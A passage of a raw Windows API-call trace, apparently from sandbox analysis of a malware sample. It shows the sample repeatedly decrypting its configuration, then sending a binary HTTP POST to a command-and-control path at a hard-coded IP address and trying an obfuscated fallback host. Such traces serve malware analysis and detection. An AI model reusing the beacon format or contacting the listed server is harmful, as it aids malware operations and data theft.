[0282.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0282.177] GetProcessHeap () returned 0x690000 [0282.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0282.178] GetProcessHeap () returned 0x690000 [0282.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0282.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.181] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.187] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0282.218] GetProcessHeap () returned 0x690000 [0282.218] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0282.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.219] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0282.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.220] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.221] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.221] GetProcessHeap () returned 0x690000 [0282.221] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0282.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.222] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0282.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.223] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0282.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.224] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0282.224] GetProcessHeap () returned 0x690000 [0282.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0282.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.225] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0282.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.226] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0282.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.227] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0282.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.228] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0282.228] GetProcessHeap () returned 0x690000 [0282.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0282.228] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0282.228] GetProcessHeap () returned 0x690000 [0282.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0282.228] socket (af=2, type=1, protocol=6) returned 0x8d0 [0282.228] connect (s=0x8d0, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0282.264] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0282.264] GetProcessHeap () returned 0x690000 [0282.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0282.264] GetProcessHeap () returned 0x690000 [0282.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0282.264] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0282.265] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0282.265] GetProcessHeap () returned 0x690000 [0282.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0282.265] GetProcessHeap () returned 0x690000 [0282.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0282.266] GetProcessHeap () returned 0x690000 [0282.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0282.266] GetProcessHeap () returned 0x690000 [0282.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0282.267] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0282.268] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0282.268] GetProcessHeap () returned 0x690000 [0282.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0282.268] GetProcessHeap () returned 0x690000 [0282.269] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0282.269] send (s=0x8d0, buf=0x6ad508*, len=242, flags=0) returned 242 [0282.269] send (s=0x8d0, buf=0x6aba40*, len=159, flags=0) returned 159 [0282.269] GetProcessHeap () returned 0x690000 [0282.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0282.269] recv (in: s=0x8d0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0282.354] GetProcessHeap () returned 0x690000 [0282.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0282.355] GetProcessHeap () returned 0x690000 [0282.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0282.357] GetProcessHeap () returned 0x690000 [0282.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0282.357] GetProcessHeap () returned 0x690000 [0282.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0282.358] closesocket (s=0x8d0) returned 0 [0282.358] GetProcessHeap () returned 0x690000 [0282.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0282.358] GetProcessHeap () returned 0x690000 [0282.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0282.359] GetProcessHeap () returned 0x690000 [0282.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0282.359] GetProcessHeap () returned 0x690000 [0282.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0282.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16c4) returned 0x8d0 [0282.361] Sleep (dwMilliseconds=0xea60) [0282.363] GetProcessHeap () returned 0x690000 [0282.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0282.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.364] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0282.379] GetProcessHeap () returned 0x690000 [0282.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0282.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.384] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0282.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.385] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.386] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.386] GetProcessHeap () returned 0x690000 [0282.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0282.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.387] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0282.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.388] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0282.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.389] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0282.389] GetProcessHeap () returned 0x690000 [0282.389] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0282.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.390] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.391] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.392] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.393] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.393] GetProcessHeap () returned 0x690000 [0282.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0282.393] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0282.393] GetProcessHeap () returned 0x690000 [0282.394] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0282.394] GetProcessHeap () returned 0x690000 [0282.394] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0282.397] GetProcessHeap () returned 0x690000 [0282.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0282.397] GetProcessHeap () returned 0x690000 [0282.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0282.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.399] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.405] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0282.410] GetProcessHeap () returned 0x690000 [0282.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0282.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.411] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0282.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.414] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.415] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.415] GetProcessHeap () returned 0x690000 [0282.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0282.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.416] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0282.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.417] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0282.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.418] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0282.418] GetProcessHeap () returned 0x690000 [0282.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0282.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.419] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0282.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.420] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0282.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.421] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0282.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.421] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0282.421] GetProcessHeap () returned 0x690000 [0282.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0282.422] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0282.422] GetProcessHeap () returned 0x690000 [0282.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0282.422] socket (af=2, type=1, protocol=6) returned 0x8d4 [0282.422] connect (s=0x8d4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0282.456] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0282.456] GetProcessHeap () returned 0x690000 [0282.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0282.456] GetProcessHeap () returned 0x690000 [0282.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0282.459] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0282.460] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0282.460] GetProcessHeap () returned 0x690000 [0282.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0282.460] GetProcessHeap () returned 0x690000 [0282.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0282.460] GetProcessHeap () returned 0x690000 [0282.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0282.461] GetProcessHeap () returned 0x690000 [0282.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0282.461] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0282.462] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0282.462] GetProcessHeap () returned 0x690000 [0282.462] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0282.462] GetProcessHeap () returned 0x690000 [0282.463] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0282.463] send (s=0x8d4, buf=0x6ad508*, len=242, flags=0) returned 242 [0282.463] send (s=0x8d4, buf=0x6aba40*, len=159, flags=0) returned 159 [0282.464] GetProcessHeap () returned 0x690000 [0282.464] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0282.464] recv (in: s=0x8d4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0282.552] GetProcessHeap () returned 0x690000 [0282.552] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0282.552] GetProcessHeap () returned 0x690000 [0282.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0282.553] GetProcessHeap () returned 0x690000 [0282.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0282.553] GetProcessHeap () returned 0x690000 [0282.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0282.553] closesocket (s=0x8d4) returned 0 [0282.554] GetProcessHeap () returned 0x690000 [0282.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0282.554] GetProcessHeap () returned 0x690000 [0282.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0282.554] GetProcessHeap () returned 0x690000 [0282.555] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0282.555] GetProcessHeap () returned 0x690000 [0282.555] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0282.556] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16c8) returned 0x8d4 [0282.558] Sleep (dwMilliseconds=0xea60) [0282.559] GetProcessHeap () returned 0x690000 [0282.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0282.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.565] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.571] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0282.577] GetProcessHeap () returned 0x690000 [0282.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0282.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.578] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0282.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.579] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.580] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.580] GetProcessHeap () returned 0x690000 [0282.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0282.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.584] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0282.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.588] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0282.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.588] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0282.588] GetProcessHeap () returned 0x690000 [0282.588] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0282.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.589] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.590] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.597] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.598] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.598] GetProcessHeap () returned 0x690000 [0282.598] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0282.598] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0282.599] GetProcessHeap () returned 0x690000 [0282.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0282.599] GetProcessHeap () returned 0x690000 [0282.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0282.599] GetProcessHeap () returned 0x690000 [0282.600] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0282.600] GetProcessHeap () returned 0x690000 [0282.600] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0282.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.601] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.607] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0282.612] GetProcessHeap () returned 0x690000 [0282.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0282.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.613] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: 